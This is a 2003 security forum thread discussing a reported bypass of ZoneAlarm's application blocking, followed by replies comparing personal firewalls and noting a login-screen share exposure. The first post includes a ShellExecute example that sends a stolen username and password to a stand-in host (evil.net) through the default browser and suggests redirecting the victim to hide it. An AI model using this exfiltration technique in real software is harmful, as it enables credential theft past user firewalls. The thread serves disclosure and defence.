-
June 23rd, 2003, 09:39 PM
#1
Bypassing ZoneAlarm
Hi everyone this was one email i just got and i thought i post it .........looks like ZoneAlarm users need to do some reconf.
I don't know if this is a new issue but it is a simple way to
bypass (in some limited form) ZoneAlarm's Application level
Internet access blocking.
Windows dll shell32.dll exports a well known and documented function called
ShellExecute. From Win32 Programmer's refference:
>HINSTANCE ShellExecute(
> HWND hwnd, // handle to parent window
> LPCTSTR lpOperation, // pointer to string that specifies
> // operation to perform
> LPCTSTR lpFile, // pointer to filename or folder name string
> LPCTSTR lpParameters, // pointer to string that specifies
> //executable-file parameters
> LPCTSTR lpDirectory, // pointer to string that specifies default
directory
> INT nShowCmd // whether file is shown when opened
> );
When the lpFile parameter is an Internet url, windows invokes Internet
Explorer (or more accurately - the default web browser), which in 99% of
the cases is allowed to access Internet, with that url. Example:
ShellExecute(
0,
"open",
"http://evil.net/collect.cgiun=stolen_username&pw=stollen_password"
0,
0,
SW_HIDE //This doesn't work.
//I think it is supposed to hide the window but ...
);
The collect.cgi (after storing stolen_username/stolen_password) could
redirect the user for example to
windowsupdate.microsoft.com,
so that many users will not even suspect anything.
The info leaked is limited by the maximum allowed url length, but that
could be more than enough for a malicious application to send some
username/password/cookie/cc_number info to malicious server.
This was tested on ZoneAlarm 3.1.395 (freeware) but i guess that all
versions can be tricked if the user has granted access to his default
web browser by default (very likely)
VENDOR STATUS:
I thing that this is flaw in the core design of ZoneAlarm
(and/or Windows) and don't see a way it can be fixed.
WORKAROUND:
Do not allow ANY application to access Internet by default and
review each request separately.
Any comments are wellcome.
aceh
My comment on this...........It s ALWAY S safer not allowing any app. to access internet by default!!!
i m gone,thx everyone for so much fun and good info.
cheers and good bye
-
June 23rd, 2003, 09:58 PM
#2
It may be safer but what a pain in the @ss that would be for my kids. Having to go through 30- 50 "application allow" popups every day. Why not just use a better product? Outpost anyone? Sygate?
But thanks for the heads up about ZA, not like I'd ever buy it or use it.
Mankind have a great aversion to intellectual labor; but even supposing knowledge to be easily attainable, more people would be content to be ignorant than would take even a little trouble to acquire it.
- Samuel Johnson
-
June 23rd, 2003, 10:17 PM
#3
lol
I went to their site to see if this was reported and if they have a patch. The site is down
West of House
You are standing in an open field west of a white house, with a boarded front door.
There is a small mailbox here.
-
June 23rd, 2003, 10:44 PM
#4
ZoneAlarm needs to be seriusly checked out-> it MAD.
Sygate is good
xxx
-
June 23rd, 2003, 11:03 PM
#5
Member
good post thanks for the heads up I will try out Sysgate
-
June 24th, 2003, 06:32 AM
#6
Originally posted here by KorpDeath
It may be safer but what a pain in the @ss that would be for my kids. Having to go through 30- 50 "application allow" popups every day. Why not just use a better product? Outpost anyone? Sygate?
But thanks for the heads up about ZA, not like I'd ever buy it or use it.
Haha your right with kids using a box this would be a major problem!
i m gone,thx everyone for so much fun and good info.
cheers and good bye
-
June 24th, 2003, 11:22 AM
#7
There are other probs with zonealarm too (at least with the last version I have seen, perhaps it's fixed now but I doubt it)), for instance at the log in screen, ZA is not loaded while the windows networking does. This means that everyone can access the shares on a box, like printing and file sharing, after the log in ZA limits this to the internal network... so a box at the login screen is not protected by ZA. IMHO sygate or outpost are a better choice desktop firewall.
-
June 24th, 2003, 02:29 PM
#8
What’s with all the zone labs bashing. This is a windows issue and will affect any personal firewall the same way...the firewall can stop an application but not a specific site unless you tell it what site to block. More over to pull off this exploit you need to get local access to the system or a Trojan loaded and run on the systems as you cannot normally do shell commands remotely (most windows boxes are not running telnet services). At the point some one is local/has your system compromised with a Trojan they can get your info with out using this method so your best defense in this case is to not let malicious users on the system.
Victor the true vector defense in Zonlabs is a service and loads when windows boots (as with all services) you are protected as soon as windows boots. The "You are now protected" splash screen is just the intro to the GUI.
Who is more trustworthy then all of the gurus or Buddha’s?
-
June 24th, 2003, 02:37 PM
#9
bballad, you have some excellent points, but about the splash screen thingie I have to disagree with you on that. Yep, they say it's true vector defense does what you describe, but I tested this in a little test setup and was able to access the default shares with early versions of zonelabs. That was very surprising cause I thought, like you, that the protection did work before the splash screen. I know the splash screen is only the GUI intro but there seems still to be a slight problem with the true vector idea:
It was discussed in a thread here at AO. http://www.antionline.com/showthread...ight=ZoneAlarm
Basicly it means that if you allow local shares, but do not allow local shares in ZA, by setting no trusted neigbourhood networks and highest security degree, it still will allow them when you are at the login screen. This is not a big deal, I know, and probably other products have this weakness too.
-
June 24th, 2003, 04:33 PM
#10
This is not a big deal, I know, and probably other products have this weakness too. [/B][/QUOTE]
Think your right on this one Vic.Software takes time to load before that no defense..........hardware on the other hand.......instant protection!
But like you said not a big deal if you use a good av product and practise safe computing!
i m gone,thx everyone for so much fun and good info.
cheers and good bye
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|